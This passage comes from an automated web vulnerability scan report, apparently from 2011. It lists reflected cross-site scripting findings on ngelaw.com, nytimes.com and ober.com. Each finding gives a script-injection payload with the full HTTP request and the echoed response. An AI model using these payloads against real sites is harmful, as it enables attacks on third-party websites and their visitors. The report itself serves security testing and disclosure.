Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/practice/practice.aspx?ID=5110
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:49:11 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15888


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Neal, Gerber & Eisenberg LLP Enhances Services for Clients... Philanthropic Needs with Launch of NGE Philanthropic Advisors</TITLE>
   </HEAD>
...[SNIP]...
<a href="http://www.ngelaw.com/news/detail.aspx?ID=1125&72e47"><script>alert(1)</script>7d1b9346f7e=1&print=true" target=_blank>
...[SNIP]...
5.34. http://www.ngelaw.com/news/event_detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/event_detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4126"><script>alert(1)</script>30219c23ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/event_detail.aspx?ID=688&d4126"><script>alert(1)</script>30219c23ef9=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/events.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:37 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9671


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Tax Planning for Domestic & Foreign Partnerships, LLCs, Joint Ventures & Other Strategic Alliances 2011</title>
       <meta name="description" c
...[SNIP]...
<a href="http://www.ngelaw.com/news/event_detail.aspx?ID=688&d4126"><script>alert(1)</script>30219c23ef9=1&print=true" target=_blank>
...[SNIP]...
5.35. http://www.ngelaw.com/news/events.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/events.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f573"><script>alert(1)</script>695e53aab3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/events.aspx?6f573"><script>alert(1)</script>695e53aab3f=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/detail.aspx?ID=1125
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:19 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11869


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Events</title>
       <meta name="description" content="In the Medi">
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <scr
...[SNIP]...
<a href="http://www.ngelaw.com/news/events.aspx?6f573"><script>alert(1)</script>695e53aab3f=1&print=true" target=_blank>
...[SNIP]...
5.36. http://www.ngelaw.com/news/publications.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/publications.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a379"><script>alert(1)</script>9104d78a5e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/publications.aspx?9a379"><script>alert(1)</script>9104d78a5e8=1 HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:03 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17279


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Publications</title>
       <meta name="description" content="Publication">
       <link rel="stylesheet" href="/include/main.css" type="text/css">

...[SNIP]...
<a href="http://www.ngelaw.com/news/publications.aspx?9a379"><script>alert(1)</script>9104d78a5e8=1&print=true" target=_blank>
...[SNIP]...
5.37. http://www.ngelaw.com/practice/practice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /practice/practice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3a1"><script>alert(1)</script>f830309ba81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practice/practice.aspx?ID=5110&eb3a1"><script>alert(1)</script>f830309ba81=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:49:05 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9688


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Practice Areas</title>
       <meta name="description" content=" Neal, Gerber & Eisenberg LLP..has followed a disciplined plan for intelligent gr
...[SNIP]...
<a href="http://www.ngelaw.com/practice/practice.aspx?ID=5110&eb3a1"><script>alert(1)</script>f830309ba81=1&print=true" target=_blank>
...[SNIP]...
5.38. http://www.nytimes.com/2007/02/09/business/09legal.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2007/02/09/business/09legal.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73d9c"><script>alert(1)</script>8270e395523 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/02/09/business/09legal.html73d9c"><script>alert(1)</script>8270e395523 HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:58:06 GMT
Set-cookie: RMID=de922e2c777a4dcc119e80e9; expires=Friday, 11-May-2012 16:58:06 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*18a4b=0:1|s*25523=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 58396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nytimes.com/js/c
...[SNIP]...
<A HREF="/2007/02/09/business/09legal.html73d9c"><script>alert(1)</script>8270e395523?pagewanted=print">
...[SNIP]...
5.39. http://www.nytimes.com/2009/01/13/business/13bail.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/01/13/business/13bail.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aeeb"><script>alert(1)</script>81138f4f180 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/01/13/business/13bail.html4aeeb"><script>alert(1)</script>81138f4f180 HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:58:05 GMT
Set-cookie: RMID=9ca536d012504dcc119d7965; expires=Friday, 11-May-2012 16:58:05 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*192f3=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 69262


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.ny
...[SNIP]...
<A HREF="/2009/01/13/business/13bail.html4aeeb"><script>alert(1)</script>81138f4f180?pagewanted=print">
...[SNIP]...
5.40. http://www.nytimes.com/2009/06/19/business/19scrushy.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/06/19/business/19scrushy.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f1c"><script>alert(1)</script>fa7e9ecec1d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06/19/business/19scrushy.htmlc9f1c"><script>alert(1)</script>fa7e9ecec1d HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:58:04 GMT
Set-cookie: RMID=9ca536d012504dcc119c7962; expires=Friday, 11-May-2012 16:58:04 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*18a4b=0:1|s*25523=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 63095


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nyt
...[SNIP]...
<link rel="canonical" href="http://www.nytimes.com/2009/06/19/business/19scrushy.htmlc9f1c"><script>alert(1)</script>fa7e9ecec1d">
...[SNIP]...
5.41. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2010/08/22/sports/cycling/22armstrong.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59261"><script>alert(1)</script>223d24b026d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/08/22/sports/cycling/22armstrong.html?59261"><script>alert(1)</script>223d24b026d=1 HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:57:32 GMT
Set-cookie: RMID=de922e2c777a4dcc117c807b; expires=Friday, 11-May-2012 16:57:32 GMT; path=/; domain=.nytimes.com
Content-type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/
...[SNIP]...
<a onclick="s_code_linktrack('Article-MultiPagepageNum2');" title="Page 2" href="/2010/08/22/sports/cycling/22armstrong.html?59261"><script>alert(1)</script>223d24b026d=1&pagewanted=2">
...[SNIP]...
5.42. http://www.ober.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49665"><script>alert(1)</script>9dabadac29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico49665"><script>alert(1)</script>9dabadac29c HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmb=229248322.1.10.1305216548; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:09:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6376
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/favicon.ico49665"><script>alert(1)</script>9dabadac29c');" title="Email Page">
...[SNIP]...
5.43. http://www.ober.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a536"><script>alert(1)</script>213e563a4ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?9a536"><script>alert(1)</script>213e563a4ed=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmb=229248322.1.10.1305216548; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:09:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6394
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/favicon.ico?9a536"><script>alert(1)</script>213e563a4ed=1');" title="Email Page">
...[SNIP]...
5.44. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3b8"><script>alert(1)</script>ec0c23d5df8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events6d3b8"><script>alert(1)</script>ec0c23d5df8/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:47:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6544
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/news_events6d3b8"><script>alert(1)</script>ec0c23d5df8/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible');" title="Email Page">
...[SNIP]...
5.45. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4d4"><script>alert(1)</script>69061af1f16 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligibledf4d4"><script>alert(1)</script>69061af1f16 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:47:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6544
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligibledf4d4"><script>alert(1)</script>69061af1f16');" title="Email Page">
...[SNIP]...
5.46. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95711"><script>alert(1)</script>322bdf9b4a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible?95711"><script>alert(1)</script>322bdf9b4a0=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible?95711"><script>alert(1)</script>322bdf9b4a0=1');" title="Email Page">
...[SNIP]...
5.47. http://www.ober.com/practices/32 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/32

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69947"><script>alert(1)</script>d5b2c987af8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices69947"><script>alert(1)</script>d5b2c987af8/32 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/intellectual-property
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:56:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6378
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices69947"><script>alert(1)</script>d5b2c987af8/32');" title="Email Page">
...[SNIP]...
5.48. http://www.ober.com/practices/32 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/32

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654ac"><script>alert(1)</script>eee4ab0516 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/32654ac"><script>alert(1)</script>eee4ab0516 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/intellectual-property
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:56:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 6376
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="javascript:email_window('http://www.ober.com/practices/32654ac"><script>alert(1)</script>eee4ab0516');" title="Email Page">
...[SNIP]...
5.49. http://www.ober.com/practices/32 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/32

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffd5"><script>alert(1)</script>f69cf4179ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices/32?5ffd5"><script>alert(1)</script>f69cf4179ca=1 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/intellectual-property
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:55:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
